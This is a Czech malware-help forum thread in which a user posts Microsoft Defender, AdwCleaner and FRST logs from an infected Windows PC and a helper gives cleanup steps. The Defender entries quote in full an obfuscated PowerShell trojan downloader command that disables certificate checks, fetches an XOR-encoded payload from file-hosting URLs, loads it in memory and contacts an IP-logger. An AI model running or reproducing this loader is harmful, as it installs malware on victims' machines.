Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2519.0, AS: 1.329.2519.0, NIS: 1.329.2519.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

Date: 2021-01-20 10:29:02.0140000Z
Description:
Antivirová ochrana v programu Microsoft Defender zjistil malware nebo jiný potenciálně nežádoucí software.
Další informace:
https://go.microsoft.com/fwlink/?linkid ... terprise=0
Název: TrojanDownloader:PowerShell/Gripogle.A
ID: 2147767492
Závažnost: Vážné
Kategorie: Trojský stahovací program
Cesta: CmdLine:_C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe [Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$dOZcdIsKCaak=(New-Object Net.WebClient).DownloadData('https://pixeldrain.com/api/file/jChFnuTF');for ($i=0;$i -lt $dOZcdIsKCaak.Length;$i++){$dOZcdIsKCaak[$i]=[byte]($dOZcdIsKCaak[$i] -bxor 'Ihv'[$i % 'Ihv'.Length])};[Threading.Thread]::GetDomain().Load($dOZcdIsKCaak);[sxT]::oEr('https://dl.dropbox.com/s/a6i75g8ban8to85/sUeLzvMwVINE', 'RegSvcs.exe', 'https://iplogger.org/1KDm37', '', 'VRSKOJqu')
Původ detekce: Neznámý
Typ detekce: Konkrétní
Zdroj detekce: Systém
Uživatel: NT AUTHORITY\SYSTEM
Název procesu: Unknown
Verze bezpečnostních informací: AV: 1.329.2507.0, AS: 1.329.2507.0, NIS: 1.329.2507.0
Verze modulu: AM: 1.1.17700.4, NIS: 1.1.17700.4

==================== Memory info ===========================

BIOS: American Megatrends Inc. P1.30 05/25/2010
Motherboard: ASRock HM55-HT
Processor: Intel(R) Core(TM) i3 CPU M 350 @ 2.27GHz
Percentage of memory in use: 72%
Total physical RAM: 3767.05 MB
Available physical RAM: 1051.44 MB
Total Virtual: 7351.05 MB
Available Virtual: 4661.58 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:111.19 GB) (Free:60.17 GB) NTFS
Drive d: (Místní disk) (Fixed) (Total:465.76 GB) (Free:230.27 GB) NTFS
Drive e: (HDD Záloha) (Fixed) (Total:465.76 GB) (Free:63.57 GB) NTFS
Drive g: (HDD SERIÁLY) (Fixed) (Total:1862.56 GB) (Free:76.56 GB) FAT32

\\?\Volume{89fed6d2-0000-0000-0000-100000000000}\ (Rezervováno systémem) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
\\?\Volume{89fed6d2-0000-0000-0000-a0d21b000000}\ () (Fixed) (Total:0.5 GB) (Free:0.08 GB) NTFS

==================== MBR & Partition Table ====================

==========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 111.8 GB) (Disk ID: 89FED6D2)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=509 MB) - (Type=27)

==========================================================
Disk: 1 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: B5BDF682)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==========================================================
Disk: 2 (Size: 1863 GB) (Disk ID: 055752AB)
Partition 1: (Not Active) - (Size=1863 GB) - (Type=0C)

==========================================================
Disk: 3 (MBR Code: Windows 7/8/10) (Size: 465.8 GB) (Disk ID: DD2566A6)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)

==================== End of Addition.txt =======================

Re: Please check my log

Posted: 20 Jan 2021 18:54
by Diallix
Hello.

Download the AdwCleaner tool to your desktop; the download link is here: https://toolslib.net/downloads/finish/1/
Before running the tool, close all open program windows, that is, all programs running on the desktop.
Right-click the program -> Run as administrator.
Continue by clicking the Scan Now button and wait until the system scan finishes.
After the scan, leave all checkboxes and any threats found selected, and continue with the Clean and Repair button in the lower right corner.
After the PC restarts, AdwCleaner will start; click View Log File (Zobrazit soubor protokolu).
The log will open; copy its contents here.

Re: Request for a log check

Posted: 20 Jan 2021 19:11
by chenny
Here is the next log

# -------------------------------
# Malwarebytes AdwCleaner 8.0.9.0
# -------------------------------
# Build: 01-11-2021
# Database: 2021-01-11.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 01-20-2021
# Duration: 00:00:03
# OS: Windows 10 Pro
# Cleaned: 10
# Failed: 0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

No malicious registry entries cleaned.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

Deleted BS Player Customized Web Search
Deleted MyStart Search
Deleted MyStart Search
Deleted Search the web (Babylon)
Deleted Search the web (Babylon)
Deleted WebSearch
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net
Deleted default-search.net

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [2186 octets] - [20/01/2021 16:59:03]
AdwCleaner[C00].txt - [2094 octets] - [20/01/2021 16:59:29]
AdwCleaner[S01].txt - [2027 octets] - [20/01/2021 17:10:25]
AdwCleaner[C01].txt - [2028 octets] - [20/01/2021 17:12:09]
AdwCleaner[S02].txt - [2149 octets] - [20/01/2021 19:08:48]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C02].txt ##########

Re: Request for a log check

Posted: 20 Jan 2021 19:17
by Diallix
Please post new FRST + ADDITION logs.

Re: Request for a log check

Posted: 20 Jan 2021 19:49
by chenny
FRST log

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 20-01-2021
Ran by IRENA-PC (administrator) on IRENA-PC (20-01-2021 19:42:40)
Running from C:\Users\IRENA-PC\Desktop
Loaded Profiles: IRENA-PC
Platform: Windows 10 Pro Version 2004 19041.746 (X64) Language: Čeština (Česko)
Default browser: Chrome
Boot Mode: Normal

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Firebit OU -> Rainmeter) C:\Program Files\Rainmeter\Rainmeter.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler.exe
(Google LLC -> Google LLC) C:\Program Files (x86)\Google\Update\1.3.36.52\GoogleCrashHandler64.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxpers.exe
(Intel Corporation - pGFX -> Intel Corporation) C:\Windows\System32\igfxtray.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\oobe\UserOOBEBroker.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2011.6-0\NisSrv.exe
(Open Source Developer, Robin Krom -> Greenshot) C:\Program Files\Greenshot\Greenshot.exe
(Oracle America, Inc. -> Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft) C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe
(TeamViewer Germany GmbH -> TeamViewer Germany GmbH) C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe
(VIA Technologies Inc. -> VIA Technologies, Inc.) C:\Windows\System32\ViakaraokeSrv.exe

==================== Registry (Whitelisted) ===================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [Greenshot] => C:\Program Files\Greenshot\Greenshot.exe [527792 2017-01-28] (Open Source Developer, Robin Krom -> Greenshot)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [509936 2018-04-11] (Adobe Systems Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Aimersoft Helper Compact.exe] => C:\Program Files (x86)\Common Files\Aimersoft\Aimersoft Helper Compact\ASHelper.exe [2138272 2016-10-08] (Shenzhen Jia Xing Investment Co., Ltd. -> AimerSoft)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [706680 2020-09-17] (Oracle America, Inc. -> Oracle Corporation)
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Value] => C:\Program Files\MSBuild\Microsoft\sigoren.vbe [1223 2020-02-25] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Microsoft Software Essentials] => C:\ProgramData\Microsoft Essentials\Software Essentials.vbs [12320 2020-03-16] () [File not signed]
HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\...\Run: [Adobe Reader Synchronizer] => C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe [5491248 2020-12-07] (Adobe Inc. -> Adobe Systems Incorporated)
HKLM\...\Print\Monitors\us008 Langmon: C:\WINDOWS\system32\us008lm.dll [31256 2016-02-15] (Microsoft Windows Hardware Compatibility Publisher -> )
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> C:\Program Files (x86)\Google\Chrome\Application\87.0.4280.141\Installer\chrmstp.exe [2021-01-07] (Google LLC -> Google LLC)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Poslat do aplikace OneNote.lnk [2017-11-14]
ShortcutTarget: Poslat do aplikace OneNote.lnk -> C:\Program Files\Microsoft Office\Office16\ONENOTEM.EXE (Microsoft Corporation -> Microsoft Corporation)
Startup: C:\Users\IRENA-PC\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Rainmeter.lnk [2019-10-05]
ShortcutTarget: Rainmeter.lnk -> C:\Program Files\Rainmeter\Rainmeter.exe (Firebit OU -> Rainmeter)
GroupPolicy: Restriction ? <==== ATTENTION
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION

==================== Scheduled Tasks (Whitelisted) ============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

Task: {0F781840-4995-487B-B8DB-7FF1EBC5C707} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [693216 2021-01-07] (Mozilla Corporation -> Mozilla Foundation)
Task: {10E62E26-1578-4A0E-8611-FFDA4C61A221} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {114D61BE-723E-4720-9A0D-15FEB326AC4B} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {21567792-F593-4A2B-A8B0-FD12215C4505} - System32\Tasks\PrivaZer_SkipUAC => C:\Program Files (x86)\PrivaZer\PrivaZer.exe [19999848 2021-01-09] (Goversoft LLC -> Goversoft LLC)
Task: {2765CE0A-1B19-47DC-BC12-CDD903EF335B} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Verification => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {64EFD4BD-F0D7-4F88-AE46-F5DA6CEA8254} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cleanup => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {87D9290F-3525-4C2A-BBCB-0D49A626C8EE} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office16\OLicenseHeartbeat.exe [316632 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {8E9C0AAA-5D6D-45B9-8856-FD83EA5BEDC6} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {9567EB88-214D-4752-88E7-2B395BCEA8D3} - System32\Tasks\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance => C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MpCmdRun.exe [545704 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
Task: {CD7FA012-E446-4088-B57D-E33EE8969426} - \Microsoft\Windows\UNP\RunCampaignManager -> No File <==== ATTENTION
Task: {DEA268E2-12DD-4984-AB28-F8F89AFCFFCA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156104 2020-03-23] (Google LLC -> Google LLC)
Task: {EB806155-3D2A-4177-A203-0FD110F04427} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
Task: {EEA50510-8C7D-45F8-BEF4-240855B8A812} - System32\Tasks\AutoKMS => C:\WINDOWS\AutoKMS\AutoKMS.exe
Task: {F4FC8779-698F-4176-95A0-5286A8AEA159} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [416432 2015-07-31] (Microsoft Corporation -> Microsoft Corporation)

(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)


==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{3ca49153-5896-4467-b2d9-205cc451433b}: [DhcpNameServer] 192.168.0.1 1.1.1.1
Tcpip\..\Interfaces\{6275ca9c-c816-47f0-8729-a3236c979e44}: [DhcpNameServer] 192.168.0.1 1.1.1.1

Edge:
=======
DownloadDir: C:\Users\IRENA-PC\Downloads
Edge DefaultProfile: Default
Edge Profile: C:\Users\IRENA-PC\AppData\Local\Microsoft\Edge\User Data\Default [2021-01-20]

FireFox:
========
FF DefaultProfile: woy2c7nl.default-1506939824614
FF ProfilePath: C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 [2021-01-20]
FF Homepage: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://www.seznam.cz/
FF Notifications: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> hxxps://sktorrent.os.tc; hxxps://kryptomagazin.cz
FF NewTabOverride: Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614 -> Disabled: {672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}
FF Extension: (HLS Video Download) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\@hls.video.download.xpi [2021-01-05]
FF Extension: (Download with Ant Download Manager) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\antffw@antdownloadmanager.com.xpi [2021-01-05]
FF Extension: (Avast Online Security) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\wrc@avast.com.xpi [2020-06-19]
FF Extension: (Video Downloader for FireFox) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{672e9d7d-f917-49e9-a2cb-eeae9a7cd1af}.xpi [2021-01-05]
FF Extension: (KITVideofy) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{6c09ef97-fbbc-4dc1-bc9a-777b216f1303}.xpi [2021-01-05]
FF Extension: (Plná Peněženka Lištička Lite) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{85d8e8cc-273a-4845-a75b-4b44377c703c}.xpi [2021-01-13]
FF Extension: (Video DownloadHelper) - C:\Users\IRENA-PC\AppData\Roaming\Mozilla\Firefox\Profiles\woy2c7nl.default-1506939824614\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-12-16]
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @java.com/DTPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\dtplugin\npDeployJava1.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.271.2 -> C:\Program Files (x86)\Java\jre1.8.0_271\bin\plugin2\npjp2.dll [2020-10-26] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\Office16\NPSPWRAP.DLL [2015-07-31] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-12-07] (Adobe Inc. -> Adobe Systems Inc.)

Chrome:
=======
CHR DefaultProfile: Default
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default [2021-01-20]
CHR DownloadDir: D:\Filmy\Seriály\Telenovely
CHR Notifications: Default -> hxxps://app.expertoption.com; hxxps://app.plus500.com; hxxps://calendar.google.com; hxxps://findmedia.biz; hxxps://ganesha.goodly.pro; hxxps://gofesm.com; hxxps://kryptomagazin.sk; hxxps://my.jdownloader.org; hxxps://prokliky.cz; hxxps://solvena.ru; hxxps://thestreetlottery.com; hxxps://trading11.com; hxxps://watch-video.net; hxxps://www.facebook.com; hxxps://www.nej-ceny.cz; hxxps://www.netflix.com; hxxps://www.publish0x.com; hxxps://www.youtube.com; hxxps://zignaly.com
CHR HomePage: Default -> hxxps://www.seznam.cz/
CHR StartupUrls: Default -> "hxxp://seznam.cz/","hxxp://www.google.cz/","hxxps://www.google.com ... oogle.com/"
CHR Extension: (Easy Auto Refresh) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\aabcgdmkeabbnleenpncegpcngjpnjkc [2019-07-01]
CHR Extension: (Seznam doplněk - Esko-) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blmojkbhnkkphngknkmgccmlenfaelkd [2019-10-08]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2017-01-30]
CHR Extension: (Aliexpress SuperStar česky, Historie cen a koruny) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\ciclollkolafellcaolgccmfjldgpolo [2020-04-19]
CHR Extension: (YouTube Music) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cinhimbnkkaeohfgghhklpknlkffjgod [2021-01-14]
CHR Extension: (Image Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\cnpniohnfphhjihaiiggeabnkjhpaldj [2019-01-27]
CHR Extension: (ZenMate - IP & Browser Check) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\dchhalahcjpkabdgonjhoogdcipienhf [2017-01-30]
CHR Extension: (YouTube) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\egjdagpondeapnnockkjcocjdkfkffnb [2021-01-14]
CHR Extension: (Přehrávání | SledovaniTV.cz) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gccmmlklnkpaihbmbpcdknammjmmdocb [2021-01-14]
CHR Extension: (AdBlock — best ad blocker) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2021-01-15]
CHR Extension: (Stream Video Downloader) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-16]
CHR Extension: (Hangouts Google) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nckgahadagoaajjgafhacjanaoiihapd [2020-08-13]
CHR Extension: (Platby Internetového obchodu Chrome) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-04]
CHR Extension: (SS TV Remote) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\npciacphlpgklgcjgiamnmfjipjdkacf [2020-03-23]
CHR Extension: (Gmail) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2020-10-25]
CHR Extension: (Chrome Media Router) - C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2020-12-09]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\Guest Profile [2021-01-20]
CHR Profile: C:\Users\IRENA-PC\AppData\Local\Google\Chrome\User Data\System Profile [2021-01-20]
CHR HKU\S-1-5-21-3708313529-2431682257-2596704864-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo]

Brave:
=======
BRA Profile: C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2021-01-20]
BRA Extension: (McAfee® WebAdvisor) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\fheoggkfdfchfphceeifdbepaooicaho [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm\2.0.673 [2019-02-09]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2019-02-09]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2019-02-23]
BRA Extension: (Brave Tor Client Updater (Windows)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\cpoalefficncklhjfpglfiplenlpccdb [2019-02-09]
BRA Extension: (PDF Viewer) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oemmndcbldboiebfnladdacbdfmadadm [2019-02-09]
BRA Extension: (Brave Ad Block Updater (CZE, SVK: EasyList Czech and Slovak)) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\omkkefoeihpbpebhhbhmjekpnegokpbj [2019-02-23]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\IRENA-PC\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2019-02-09]

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5198064 2021-01-13] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [13172752 2020-01-22] (TeamViewer Germany GmbH -> TeamViewer Germany GmbH)
R2 VIAKaraokeService; C:\WINDOWS\system32\viakaraokesrv.exe [36504 2015-06-22] (VIA Technologies Inc. -> VIA Technologies, Inc.)
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\NisSrv.exe [2491880 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2011.6-0\MsMpEng.exe [128376 2020-12-04] (Microsoft Windows Publisher -> Microsoft Corporation)

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [279040 2019-12-07] (Microsoft Corporation) [File not signed]
S3 e2eVAWdm; C:\WINDOWS\System32\drivers\VAud_WDM.sys [112696 2017-07-12] (ARTRAY CO., LTD. -> e2eSoft)
R2 npf; C:\WINDOWS\system32\drivers\npf.sys [36600 2018-12-07] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
R3 nuviocir; C:\WINDOWS\system32\DRIVERS\nuviocir_x64.sys [40464 2015-05-07] (Microsoft Windows Hardware Compatibility Publisher -> Nuvoton Technology Corp.)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-12-04] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429296 2020-12-04] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [70896 2020-12-04] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) (Whitelisted) =========

(If an entry is included in the fixlist, the file/folder will be moved.)

2021-01-20 18:40 - 2021-01-20 19:43 - 000020181 _____ C:\Users\IRENA-PC\Desktop\FRST.txt
2021-01-20 16:58 - 2021-01-20 16:59 - 000000000 ____D C:\AdwCleaner
2021-01-20 16:57 - 2021-01-20 16:55 - 008458096 _____ (Malwarebytes) C:\Users\IRENA-PC\Desktop\adwcleaner_8.0.9.exe
2021-01-20 09:32 - 2017-07-12 23:48 - 000112696 _____ (e2eSoft) C:\WINDOWS\system32\Drivers\VAud_WDM.sys
2021-01-20 09:02 - 2021-01-20 09:03 - 000433944 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2021-01-20 08:46 - 2021-01-20 08:46 - 000000000 ____D C:\Users\IRENA-PC\AppData\Roaming\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\ProgramData\GlarySoft
2021-01-20 08:45 - 2021-01-20 09:01 - 000000000 ____D C:\Program Files (x86)\Glarysoft
2021-01-20 08:16 - 2021-01-20 10:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GridinSoft Anti-Malware
